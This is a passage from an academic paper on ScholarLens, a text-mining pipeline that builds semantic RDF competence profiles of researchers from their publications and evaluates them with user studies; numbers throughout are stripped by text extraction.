cortis et al. ( ): they developed a system for analyzing user profiles from heterogenous online resources in order to aggregate them into one unique profile. for this task, they used gate’s annie (https://gate.ac.uk/sale/tao/splitch .html) plugin (cunningham et al., ) and adapted its jape grammar rules to disassemble a person’s name into five sub-entities, namely, prefix, suffix, first name, middle name and surname. in addition, a large knowledge base (lkb) gazetteer was incorporated to extract supplementary city and country values from dbpedia (http://dbpedia.org). in their approach, location-related attributes (e.g., ‘dublin’ and ‘ireland’) could be linked to each other based on these semantic extensions, where a string-matching approach would have failed. in their user evaluation, the participants were asked to assess their merged profile on a binary rating scale. more than % of the produced profile entries were marked as correct. the results sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://stanfordnlp.github.io/corenlp/ https://www.linkedin.com https://gate.ac.uk/sale/tao/splitch .html http://dbpedia.org http://dx.doi.org/ . /peerj-cs. reveal that profile matchers can improve the management of one’s personal information across different social networks and support recommendations of possibly interesting new contacts based on similar preferences. discussion as presented above, automatic user profiling approaches using linked named entities and nlp techniques are becoming increasingly popular. sources for generating profiles vary from scientific papers to social media items, profiles in social networks or an aggregation of different sources. in particular, expert profiling has evolved into its own research area. however, the most widespread description of a user model in these applications is still a term-based vector representation. even though keywords are increasingly replaced by linked entities, they still lack an underlying semantic model in rdf or owl format. in contrast, we aim at automatically creating semantic user profiles for scholars by means of nlp methods and semantic web technologies. our goal is to establish user profiles in an interoperable rdf format that can be stored in a triplestore. hosting user information in such a structured and meaningful semantic format facilitates data integration across different sources. furthermore, expressive sparql queries and inferences can help to discover related preferences that are not explicitly stated in the profiles. the open, shared knowledge base constructed by our approach can then be accessed by a multitude of different scholarly applications. design modeling semantic scholarly profiles requires a formalization of the relations between authors and their competences in a semantically rich format. the three central concepts in our model are researchers, their competence topics and a set of scholarly documents. we hypothesize that authors of a scholarly publication (e.g., a journal article) are competent in topics mentioned in the article to various degrees. this way, for each author (i.e., researcher with at least one publication) we create a semantic user profile. with the ultimate goal of creating machine-readable, inter-operable profiles, we decided to use the w c standard resource description framework (rdf) to design profiles based on semantic triples. semantic modeling of user competence records every entity in our model is defined as a semantic triple 〈s,p,o〉, where s is a unique resource identifier (uri) within the knowledge base, p is a property from a set of pre-defined relations between authors and their profile elements, and o is either a unique identifier of an entity (in the knowledge base or an external dataset), or a literal value. all users in our model are instances of the user model ontology (um) (http: //intelleo.eu/ontologies/user-model/spec/) user class, designed specifically for modeling users in collaborative contexts. as a subclass of the foaf person class, all user instances inherit attributes and relations from the foaf vocabulary. since our primary source of competence detection are the users’ publications, we also need to semantically model the documents and their content. for a user u, we denote du ={d ,d ,...,dn} as a set of documents published by the user. each document d contains a set of topics sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://intelleo.eu/ontologies/user-model/spec/ http://intelleo.eu/ontologies/user-model/spec/ http://dx.doi.org/ . /peerj-cs. td ={t ,t ,...,tn}, where each ti is essentially a named entity (ne), like ‘text mining’ or ‘automatic reasoning’ within the document’s sentences. topics are often repeated many times in a document. thus, we need to be able to annotate where a topic is mentioned in a document. every topic t will then have two attributes: a start and end offset, containing the index of their first and last character in the document. this way, every mention of a competence topic found in a document is modeled as a semantic triple and we can count the frequency of the competence topics mentioned in each document, as well as overall for each user profile. the challenge here is to identify various orthographic forms of the same topic in a document, so that we can determine the unique topics in t . for instance, topic ‘linked open data’ may be mentioned in the abstract of a document and then later on ‘lod’ may appear in the background section. this results in two triples, each describing the two competence topics with different forms in text, although, in fact they represent the same concept. as a solution, each mention of topic t will be the subject of an additional triple 〈t,rdfs : isdefinedby,l〉, where l is the uri of a resource, where the topic (concept) is defined in a given knowledge base or dataset. unique topics with different surface forms in the document can now be identified through their resource uri. in our model, users and their competence topics are inter-connected through competence records. a competence record contains the provenance metadata of a user’s competences (e.g., the document identifier in which it was found) and can be additionally associated with a level of expertise. finally, we define a user profile as a labeled, directed graph pu =(v ,e), where v={d∪t} and e is a set of edges between a user’s publications and their encompassed topics, as well as outgoing links from the t elements to lod resources. since rdf documents intrinsically represent labeled, directed graphs, the semantic profiles of scholars extracted from the documents can be merged through common competence uris—in other words, authors extracted from otherwise disparate documents can be semantically related using their competence topics. following the best practices of producing linked open datasets, we tried to reuse existing linked open vocabularies (lovs) to the extent possible for modeling the semantic user profiles. table shows the vocabularies used to model our semantic scholar profiles and their respective selected terms. we largely reuse intelleo (http://www.intelleo.eu/) ontologies for competence modeling—originally designed for semantic modeling of learning contexts—, in particular the vocabularies for user and team modeling (http://intelleo.eu/ontologies/user-model/spec) and competence management (http://www.intelleo.eu/ontologies/competences/spec). we also reuse the pubo ontology (sateli & witte, ) for modeling the relations between the documents that we process, the generated annotations and their inter-relationships. figure shows a minimal example semantic profile in form of an rdf graph. automatic detection of competences in this section, we describe our automatic workflow for constructing semantic scholarly profiles. we first iterate the requirements of such a workflow and then present various components of our scholarlens approach that satisfy these requirements. an overview of our system architecture is illustrated in fig. . sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.intelleo.eu/ http://intelleo.eu/ontologies/user-model/spec http://www.intelleo.eu/ontologies/competences/spec http://dx.doi.org/ . /peerj-cs. "here we present a first prototype..." "prototype" ex:author# um:user rdf:type ex:bahar rdfs:isdefinedby ex:competencerecord# um:hascompetencyrecord ex:competence# c:competencefor c:competencerecord rdf:type cnt:chars c:competence rdf:type dbpedia:software_prototyping rdfs:isdefinedby ex:doc# pubo:hasannotation pubo:hasannotation ex:re# pubo:hasannotation cnt:chars pubo:containsne sro:contribution rdf:type figure the rdf graph shown in this picture represents a semantic user profile that illustrates the relations between an author and the topics mentioned in her article. table modeling user profiles with linked open vocabularies (lovs): this table shows the terms se- lected from various vocabularies and their corresponding concept in the semantic user profiles. the vo- cabulary namespaces used in the table can be de-referenced using the urls shown at the bottom. lov term modeled concept um: user scholarly users, who are the documents’ authors. um:hascompetencyrecord a property to keep track of a user’s competence (level, source, etc.). c: competency extracted topics (lod resources) from documents. c:competencefor a relation between a competence record and the competence topic. sro: rhetoricalelement a sentence containing a rhetorical entity, e.g., a contribution. cnt:chars a competence’s label (surface form) as it appeared in a document. pubo:hasannotation a property to relate annotations to documents. pubo:containsne a property to relate rhetorical zones and entities in a document. oa:start & oa:end a property to show the start/end offsets of competences in a text. notes. um, http://intelleo.eu/ontologies/user-model/ns/; c, http://intelleo.eu/ontologies/competences/ns/; sro, http: //salt.semanticauthoring.org/ontologies/sro#; cnt, http://www.w .org/ /content#; pubo, http://lod.semanticsoftware. info/pubo/pubo#; oa, http://www.w .org/ns/oa/; rdf, http://www.w .org/ / / -rdf-syntax-ns#; rdfs, http://www.w .org/ / /rdf-schema#. sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://intelleo.eu/ontologies/user-model/ns/ http://intelleo.eu/ontologies/competences/ns/ http://salt.semanticauthoring.org/ontologies/sro# http://salt.semanticauthoring.org/ontologies/sro# http://www.w .org/ /content# http://lod.semanticsoftware.info/pubo/pubo# http://lod.semanticsoftware.info/pubo/pubo# http://www.w .org/ns/oa/ http://www.w .org/ / / -rdf-syntax-ns# http://www.w .org/ / /rdf-schema# http://dx.doi.org/ . /peerj-cs. . . . . . . . . . . . . . . annotated text semantic triples pre−processed text gazetteer rule transducers named entity linking s e m a n ti c a n a ly s isenglish tokenizer sentence splitter part−of−speech tagger noun phrase chunker lemmatizer s y n ta c ti c a l p ro c e s s in g natural language processing pipeline linked open data e x p o rt annotation to triple converter knowledge basescientific literature figure the workflow shown here depicts how scientific literature undergoes various syntactical and semantic processing steps. the output of the workflow is a knowledge base populated with semantic user profiles, inter-linked with resources on the linked open data cloud. requirements our goal is to automatically populate semantic user profiles by mining the users’ publications for competence topics. therefore, we identify the following requirements for our workflow: requirement : access to scholarly articles’ full-text. the workflow should be able to accept a set of documents written by an author as input, which may be in various publisher- dependent, formatting styles. the documents must be machine-readable, that is, the workflow must be have access to the textual content of the entire article. requirement : automatic extraction of domain topics. in order to extract the competence topics, we need to annotate the named entities (nes) in a document that represent relevant concepts for a domain. for example, words like ‘benchmarking’ and ‘linear regression’ represent relevant research activities and concepts in a computer science article. requirement : semantic representation of extracted information. the extracted infor- mation from documents must be stored in a machine-readable and inter-operable format, in order to facilitate the implementation of value-added services, like expertise recommendation. the users, their publications and the competence topics must be uniquely identifiable in the output. all instances and their attributes must be represented using semantic web vocabularies. sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. text mining documents for competence topics we leverage various text mining techniques in our semantic profiling workflow. if the input document is in any format other than plain-text, it first goes through a text extraction phase. in this step, any publisher-specific formatting is eliminated from the document. the plain-text document is then prepared for further analysis in a so-called pre-processing phase. this step is language-dependant, but can be reused for documents in various domains. the first step is to break down a document’s text into tokens—smaller, linguistically meaningful segments, like words, numbers and symbols. tokens are then grouped into sentences and each word token is tagged with a part-of-speech tag, e.g., ‘noun’ or ‘verb’. to eliminate the different orthographical forms of tokens in a text, we lemmatize the document’s text, so that all inflected forms of nouns (singular vs. plural) and verbs (various tenses) are changed to their canonical form (requirement ). the pre-processed text is subsequently passed onto the semantic processing phase for user competence detection. grounding competence topics to lod resources since it is not feasible to manually construct and maintain a knowledge base of all possible topics appearing in documents, we leverage the linked open data (lod) cloud as a source of continually-updated knowledge. the idea is to link the competence topics to their corresponding resources on the lod cloud, where machine-readable, semantic metadata about each topic can be found by de-referencing the link’s address. to this end, we use a linked data-enabled named entity recognition (ner) tool that can detect named entities in the documents, resolve them to their correct sense and link the surface forms to existing resources in lod datasets (requirement ). grammatical processing performed in the previous step helps us to filter out tokens that do not typically represent competences, like adverbs or pronouns. we exclude processing the sentences in figure and table captions, formulas, section headers and references, as we empirically verified that these document regions rarely contain authors competence topics. knowledge base population as we mentioned earlier, the output of our system is a knowledge base populated with semantic user profiles (requirement ). we leverage the resource description framework (rdf) syntax to describe the extracted information in a semantically meaningful way, using the model described in ‘semantic modeling of user competence records’. in the populated user profiles, we use the raw frequency of the detected topics (named entities) in documents as a means of ranking the top competence topics for each scholar. we store the profile rdf documents in a triplestore that can later on be queried for various applications. an important design decision in modeling the knowledge base is deciding whether all (potentially hundreds) of topics in a document are indeed representative of its authors’ competences. or perhaps, a subset of the topics located in the rhetorical zones of an article are better candidates? previously in sateli & witte ( ), we investigated the detection of rhetorical entities (res) as sentences in a scholarly document that convey its authors findings or argumentations, like their claims or contributions. we also showed how the named entities within the boundaries of these res can represent a document’s content sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure this figure shows a sequence of processing resources aggregated into a gate pipeline for the automatic generation of user profiles based on competences extracted from publications. in various use cases, such as retrieving semantically related articles. additionally, we determined that storing the named entities within res requires an order of a magnitude fewer triples, compared to exporting the topics of the entire document. to test whether the same assumption can be made about the authors’ competence topics, we additionally export all rhetorical entities in a document and add an additional property to each topic (ne) that is mentioned within an re. we will revisit our hypothesis in ‘extended experiments’. implementation in this section, we describe how we realized the semantic user profiling of authors illustrated in the previous section. extraction of user competences with text mining we developed a text mining pipeline (fig. ), implemented based on the gate framework (cunningham et al., ), to analyze a given author’s papers in order to automatically extract the competence records and topics. the nlp pipeline accepts a corpus (set of documents) for each author as input. we use gate’s annie plugin to pre-process each document’s full-text and further process all sentences with the hepple part-of- speech (pos) tagger, so that their constituents are labeled with a pos tag, such as noun, verb, or adjective and lemmatized to their canonical (root) form. we then use munpex sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example annotated document for a contribution (rhetoricalentity) and the competence top- ics (dbpedianes) within its boundaries in gate graphical user interface. (http://www.semanticsoftware.info/munpex), a gate plugin to detect noun phrases in text, which helps us to extract competence topics that are noun phrases rather than nouns alone. subsequently, we use our lodtagger (http://www.semanticsoftware.info/lodtagger), which is a gate plugin that acts as a wrapper for the annotation of documents with named entity recognition tools. in our experiments, we use a local installation of dbpedia spotlight (mendes et al., ) v . with the statistical model version (http://spotlight.sztaki.hu/downloads/) for english (en_ + ) (daiber et al., ). spotlight matches the surface form of the document’s tokens against the dbpedia ontology and links them to their corresponding resource uri. lodtagger then transforms the spotlight response to gate annotations using the entities’ offsets in text and keeps their uri in the annotation’s features (fig. ). to evaluate whether our hypothesis that the nes within rhetorical zones of a document are more representative of the author’s competences than the nes that appear anywhere in a document, we decided to annotate the claim and contribution sentences of the documents using our rhetector (http://www.semanticsoftware.info/rhetector) gate plugin (sateli & witte, ). this way, we can create user profiles exclusively from the competence topics that appear within these re annotations for comparison against profiles populated from full-text. rhetector was evaluated in sateli & witte ( ) with an average f-measure of %. finally, we create a competence record between the author and each of the detected competences (represented as dbpedia nes). we use gate’s jape language that allows us to execute regular expressions over documents’ annotations by internally transforming them into finite-state machines. thereby, we create a competence record (essentially, sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.semanticsoftware.info/munpex http://www.semanticsoftware.info/lodtagger http://spotlight.sztaki.hu/downloads/ http://www.semanticsoftware.info/rhetector http://dx.doi.org/ . /peerj-cs. a gate relation) between the author annotation and every competence topic in the document. figure shows example semantic annotations generated by our text mining pipeline in the gate developer environment. automatic population of semantic user profiles the last step in our automatic generation of semantic user profiles is to export all of the gate annotations and relations from the syntactic and semantic processing phases into semantic triples, represented with rdf. our lodexporter (http://www.semanticsoftware. info/lodexporter) tool provides a flexible mapping of gate annotations to rdf triples with user-defined transformation rules. for example, the rules: map:gatecompetence map:gatetype "dbpediane" . map:gatecompetence map:hasmapping map:gatelodreffeaturemapping . map:gatelodreffeaturemapping map:gatefeature "uri" . map:gatelodreffeaturemapping map:type rdfs:isdefinedby . describe that all ‘dbpediane’ annotations in the document should be exported, and for each annotation the value of its ‘uri’ feature can be used as the object of the triple, using ‘rdfs:isdefinedby’ as the predicate. similarly, we use the lov terms shown in table to model authors, competence records and topics as semantic triples and store the results in an apache tdb-based (http://jena.apache.org/documentation/tdb/) triplestore. evaluation we performed two rounds of evaluations: in a first user study, described in detail in sateli et al. ( ) and summarized below, we tested an initial version of our profiling approach. to investigate the reasons for generated ‘irrelevant’ profile entries, we went back to a number of users from our study and performed a post-mortem error analysis. our finding are presented in ‘user study: error analysis’. based on the detected issues, we refined both our profile generation pipeline and the survey methodology for a second user study. our new setup and the results are described in ‘extended experiments’. methodology and metrics we evaluate the quality of the generated user profiles through user studies. for each participant, we processed a number of the user’s publications and created competence entries in a knowledge base. we then went back to the users and showed them the top- (by competence frequency) generated profile entries in a human-readable format, in order to evaluate whether we found a pertinent competence. to evaluate the effectiveness of our system, we utilize common retrieval evaluation methods, namely precision@k, mean average precision (map) (manning, raghavan & schütze, ) and normalized discounted cumulative gain (ndcg) (järvelin & kekäläinen, ). we first analyze the top ranked competence results of an individual user, specifically, the top- , top- and top- , and measure the precision at rank (precision@k) eq. ( ), sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.semanticsoftware.info/lodexporter http://www.semanticsoftware.info/lodexporter http://jena.apache.org/documentation/tdb/ http://dx.doi.org/ . /peerj-cs. which is defined as: precision@k= k · k∑ c= rel(c), ( ) where k denotes the rank of the competence that is considered and rel(c) marks the rating for the iterating position c, which is either for irrelevant or for relevant topics. while the precision@k is focused on the result for a certain rank of an individual user, the map is a metric that expresses the mean average of competence rankings over all users in one value. map eq. ( ) indicates how precise an algorithm or system ranks its top-k results, assuming that the entries listed on top are more relevant for the information seeker than the lower ranked results. precision is then evaluated at a given cut-off rank k, considering only the top-k results returned by the system. hence, map is the mean of the average precisions at each cut-off rank and represents a measure for computing the quality of a system across several information needs; in our case, users with competences. for all relevant competences c ∈c per user u, we compute the average precision (ap) of a user u as follows eq. ( ): ap(u)= cr,k k∑ c= precision@k·rel(c), ( ) where rel(c) is if the competence c is relevant and for the opposite case. cr,k is the set of all relevant competences up to a certain cut-off rank k. finally, for every user u∈u , the map is then defined as follows eq. ( ): map(u)= |u| |u|∑ u= ap(u). ( ) in contrast to the map, which only considers binary ratings, the dcg eq. ( ) computes the ranking based on likert scales (likert, ). given a list of competences, relc is the actual rating of each single competence c. for example, in our second user study we assign the competence types (irrelevant), (general), (technical) and (research), as defined below. similar to the precision, the dcg assumes that higher ranked items are more relevant for the users than lower ranked. in order to take this into account, a logarithmic decay function is applied to the competences, known as the gains. for a set of users u , let rel(c) be the relevance score given to competence c ∈c for user u∈u . then, the dcg for every user as defined in croft, metzler & strohman ( ) is the sum over all |c| competence gains eq. ( ): dcgu=rel + |c|∑ c= relc log c . ( ) due to the variable length of the result lists, the dcg values should be normalized across all users. therefore, the competences are sorted according to their relevance. this ordered list is called ideal dcg (idcg). finally, this idcg is used to compute the normalized dcg (ndcg) for a user u as follows eq. ( ): ndcgu= dcgu idcgu . ( ) sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. initial experiments in our first evaluation round (sateli et al., ), we reached out to ten computer scientists from concordia university, canada and the university of jena, germany (this study also included the authors of the paper) and asked them to provide us with a number of their selected publications. we processed the documents and populated a knowledge base with the researchers’ profiles. using a java command-line tool that queries this knowledge base, we generated documents as a human-readable format of the researchers’ profiles, each listing the top- competence topics, sorted by their occurrence in the users’ publications. subsequently, we asked the researchers to review their profiles across two dimensions: (i) relevance of the extracted competences and (ii) their level of expertise for each extracted competence. for each participant, we exported two versions of their profile: (i) a version with a list of competences extracted from their papers’ full-text, and (ii) a second version that only lists the competences extracted from the rhetorical zones of the documents, in order to test our hypothesis described in ‘knowledge base population’. to ensure that none of the competence topics are ambiguous to the participants, our command-line tool also retrieves the english label and comment of each topic from the dbpedia ontology using its public sparql endpoint (http://dbpedia.org/sparql). the participants were instructed to choose only one level of expertise among (‘‘novice’’, ‘‘intermediate’’, ‘‘advanced’’) for each competence and select ‘‘irrelevant’’ if the competence topic was incorrect or grounded to a wrong sense. table shows the evaluation results of our first user study. in this study, a competence was considered as relevant when it had been assigned to one of the three levels of expertise. for each participant, we measured the average precision of the generated profiles in both the full-text and re-only versions. the results show that for both the top- and top- competences, – % of the profiles generated from re-only zones had a higher precision, increasing the system map up to % in each cut-off. in the top- column, we observed a slight decline in some of the profiles’ average precision, which we believe to be a consequence of more irrelevant topics appearing in the profiles, although the map score stays almost the same for both versions. user study: error analysis in order to refine our approach, we went back to the users from the first study to understand the root cause of competences they marked as irrelevant. we asked a number of users to classify each irrelevant competence into one of four error categories: type (wrong uri). the profile contains a wrong uri: this is typically caused by the linking tool assigning the wrong uri to a surface form; either because it picked the wrong sense among a number of alternatives or the correct sense does not exist in the knowledge base. type (empty description). as explained above, we retrieve the comment for each competence uri to make sure users understand their profile entries. in about % of profile entries, this automatic process failed, leading to an empty description, which was often marked as irrelevant. we identified three main causes for this: (a) a timeout in the sparql query to the public dbpedia endpoint; (b) missing comment entry in sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dbpedia.org/sparql http://dx.doi.org/ . /peerj-cs. table evaluation results for the generated user profiles in the first user study: this table shows the number of distinct competence topics ex- tracted from the ten participants and the average precisions at , and cut-off ranks. the last row (map) shows the mean average precision of the system at various cut-offs. participant #docs #distinct competences avg. precision@ avg. precision@ avg. precision@ full-text res only full-text res only full-text res only full-text res only r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . r , . . . . . . map . . . . . . english for some resources in the online dbpedia; and the much rarer cause (c) where the uri generated by the linking tool was valid for an older version of dbpedia, but has meanwhile been removed. type (user misunderstanding). some users interpreted the task differently when it came to identifying their competences: rather than evaluating what they are generally competent in, they marked each entry that did not fall into their research fields as irrelevant. for example, a researcher working on web services marked ‘http (protocol)’ as irrelevant, since http was not a research topic in itself, though the user clearly had knowledge about it. type : (unspecific competence). users often assigned irrelevant for competences that were deemed too broad or unspecific. the cause is very similar to type , with the main difference that competences here were high-level concepts, like system, idea, or methodology, whereas type errors were assigned to technical terms, like http, data set, or user (computing). the results of this analysis are summarized in table . as can be seen, the majority of the errors ( % and %) are of type . this is consistent with earlier observations we had about dbpedia spotlight when applying it to research literature (sateli & witte, ). modifying or retraining spotlight itself was out of the scope of this work, but we addressed some common errors in our pipeline, as described below. extended experiments with the lessons learned from our first experiment, we enhanced our competence topic detection pipeline to remove the error types iterated in the previous section. in particular, to address type error, we excluded exporting entities with surface forms like ‘‘figure’’ or ‘‘table’’ from newly generated profiles, as these were consistently linked to irrelevant topics like ‘‘figure painting’’ or ‘‘ficus’’. to address type and type errors, we refined the sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table error analysis of the irrelevant competence entries generated for the participants in the first user study: for each error type, the total numbers of irrelevant competences in the profile and its percentage (rounded) is shown. error type user average r r r r r r r ; . ; type % % % % % % % % ; . ; type % % % % % % % % ; . ; type % % % % % % % % ; . ; fu ll -t ex tp ro fi le s type % % % % % % % % ; ; type % % % % % % % % ; . ; type % % % % % % % % ; . ; type % % % % % % % % ; . ; r e pr of il es type % % % % % % % % task description shown to participants before they start their evaluation. additionally, we introduced a competence classification to distinguish general competences from technical and research competences. however, to accommodate this classification we dropped the previous assessment of competence levels, as we did not want to double the workload of our study participants. automatic generation of online surveys for our revised experiment, we set up a web-based user profile evaluation system. in the new set up, instead of generating profiles for users, we implemented a survey-style profile generation tool that queries the populated knowledge base and generates web- based profiles compatible with limesurvey (https://www.limesurvey.org), an open source survey application with built-in analytics features, as shown in fig. . similar to the first experiment, we generated two surveys for each user: one with the competence topics extracted from the full-text of documents and one with topics extracted from the rhetorical zones only. to lessen the priming bias—where participants may think topics shown earlier in the survey must be more relevant to them—we randomized the order of survey questions and informed the users in the evaluation instructions about this fact. however, we internally kept the original rank of the competence topics shown in survey questions as they appear in the knowledge base profiles, so that we can compute the precision of our system in top- k cut-off ranks. we invited computer scientists to participate in our user evaluations. in total, users responded to the survey (note that an anonymized user like ‘r ’ from the second study is not necessarily the same person as in the first study). in contrast to the sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.limesurvey.org http://dx.doi.org/ . /peerj-cs. figure an automatically generated web-based survey using limesurvey: (a) depicts the instructions shown to participants to explain the sur- vey motivation and how to select a competence level, and (b) shows an example competency question with an interactive response interface. previous survey, this time we asked the users to rate the competences along three different competence types, namely general which comprises very general and broad topics such as ‘‘system’’ or ‘‘number’’, technical which refers to skills a computer scientist needs in daily work, e.g., ‘‘hypertext transfer protocol’’, and research, which points to research topics a user has been or currently is involved in, e.g., ‘‘linked data’’. result computation all responses were exported into comma-separated value (csv) files and analyzed with our own java-based command-line tool, transforming the original horizontal schema into a vertical structure, based on their original rank. we computed the precision@rank, the mean average precision (map) and the normalized discounted cumulative gain (ndcg), according to the equations presented above (‘methodology and metrics’). table presents the responses for both versions, the full-text profiles and re zones, with respect to the overall ratings across the four different competence levels. the results for the precision metrics are displayed in tables and . sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table analysis of the survey responses for profiles generated from full-text and re zones. the values shown in the columns are number of competence types as voted by the survey participants. user competence type in full-text competence type in re zones general technical research irrelevant general technical research irrelevant r r r r r r r r r r r r r r r r r r r r r r r r r total . % . % . % . % . % . % . % . % since precision@k and map are based on binary ratings (relevant/non-relevant), it has to be specified which competence levels to take into account. therefore, we defined two thresholds: irrelevant (threshold ‘ ’) and general (threshold ‘ ’). for threshold ‘ ’, we treated the responses in the general, technical and research competence types as relevant. in this case, only irrelevant entries are counted as errors. however, this might not be appropriate for every application: some use cases might want to also exclude competences in the general category. therefore, we also analyzed the results for ratings above general, in order to ensure an equal distribution (tables and ). here, competences were only considered as relevant when they were rated either as technical or research. additionally, we computed the ndcg for each profile, which does not penalize for irrelevant competence topics in profiles. sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table precision computation for profiles generated from full-text with a relevance threshold of irrelevant ( ) and general ( ). all ratings above irrelevant ( ) and general ( ) have been considered as relevant, respectively. user threshold —irrelevant threshold —general ndcg average precision precision@k average precision precision@k ap@ ap@ ap@ p@ p@ p@ ap@ ap@ ap@ p@ p@ p@ r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . mean average precision average mean average precision average . . . . . . . . . . . . . discussion overall, compared to our first user study, our enhanced method resulted in fewer irrelevant results in the user profiles. this is partially due to the improvements mentioned above, where we removed irrelevant entries that affected every generated profile (e.g., the competency entries derived from the word ‘‘figure’’). we also analyzed the distribution of competence topic types in each user profile (fig. ). in both profile versions, about – % of the detected competences were rated either as technical or research, which corroborates our hypothesis that the named entities in users’ publications are representative of their research expertise. in comparison with the full-text and re-only version of each user profile, although we observe an increase in the number of irrelevant topics, majority of them fall into the research and technical types. sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table precision computation for profiles generated from re zones with a relevance threshold of irrelevant ( ) and general ( ). all ratings above irrelevant ( ) and general ( ) have been considered as relevant, respectively. user threshold —irrelevant threshold —general ndcg average precision precision average precision precision ap@ ap@ ap@ p@ p@ p@ ap@ ap@ ap@ p@ p@ p@ r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . r . . . . . . . . . . . . . mean average precision average mean average precision average . . . . . . . . . . . . . these results are also consistent with our hypothesis that the topics in rhetorical zones of scholarly literature, like claims and contributions of authors are strong indications of their competence. as we can see from the results, the full-text profiles returned less irrelevant results and more higher ratings ( %) than the re-only version ( %). a closer look on individual responses revealed that the error (type (wrong uri)) occurred more often in the re-only version. a wrong matching of extracted terms to uris mainly causes a wrong description and hence an irrelevant result. longer and more comprehensive text passages, as in the full-text profiles, might better compensate this problem and therefore result in less uri mismatches. too broad and general competences are a further issue when looking at the ratings. again, the reason was that dbpedia spotlight that does not distinguish sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (a) r r r r r r r r r r r r r r r r r r r r r r r r r #c om pe te nc es in fu ll- te xt (b) r r r r r r r r r r r r r r r r r r r r r r r r r #c om pe te nc es in r e zo ne s general technical research irrelevant figure : the two plots show the distribution of top- competence types in full-text (a) and re-only (b) profiles from the evaluation survey responses.figure the two plots show the distribution of top- competence types in full-text (a) and re-only (b) profiles from the evaluation survey responses. between composite and single terms, for instance, ‘‘service’’ and ‘‘service provider’’. it finds successful matches for both terms and thus produces general topics. we also evaluated the rated competences with respect to their ranking in the result list. both metrics, precision@k and mean average precision have been computed across two relevance thresholds. threshold ‘ ’ denotes the results where all ratings above irrelevant were considered as relevant, namely, general, technical and research. since this division favours relevant competences, we additionally computed the precision@k and mean average precision for ratings above general. among the top- results, the re-only profiles performed slightly better for threshold ‘ ’, which indicates that all the relevant competences are a bit more likely in the top- results than in the full-text profiles. however, the ranking results turn upside down for the top- results, where the map value for the full-text version is significantly higher than for the re-only version. that reveals the ranking in full-text profiles is more stable over competences compared to re zones. sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additionally, we analyzed whether the different number of papers per user has an influence on the results. it turned out that there is no correlation between the number of papers used and the obtained precision. furthermore, we neither take into account a decay function nor distinguish between recent publications or papers a user has written a longer time ago. this leaves room for future work. for all our results, it also needs to be considered that we did not ask the users about missing competences and therefore we did not penalize for incomplete results. the results are grounded on relevance assessments for automatically extracted competences from publications. rather than completeness, it is an approach to counteract the cold-start problem in personalized applications and to minimize the burden for the user to explicitly provide pertinent information. overall, we reached high ranking values in the top- results for both thresholds, the map values for research and technical competences vary between . and . . looking at the top- competences, full-text profiles performed better than re zones. hence, we can conclude that our approach is effective for detecting a user’s background knowledge implicitly. threats to validity a threat to the external validity of our findings is the scale of evaluation, generalizing the results obtained from studying a relatively small group of computer scientists. to mitigate this effect, when choosing our sample group, we tried to be inclusive of researchers from various computer science sub-disciplines, including those who work in inter-disciplinary areas, such as bioinformatics. we also tried to include both young researchers and senior scientists with a larger number of selected publications. although the evaluation is admittedly not definitive, our results show the effectiveness and accuracy of our method for the automatic creation of scholarly profiles. at its current stage, we believe that the open source implementation of our approach will facilitate others to collect further empirical evidence, by integrating scholarlens into various scholarly applications. application examples as one of our main contributions in this paper is an open source library for generating semantic user profiles from scholarly articles, we want to demonstrate how various end-user applications can incorporate the generated user profiles. towards this end, in this section we present a number of use cases for exploiting the knowledge base generated by scholarlens. finding all competences of a user by querying the populated 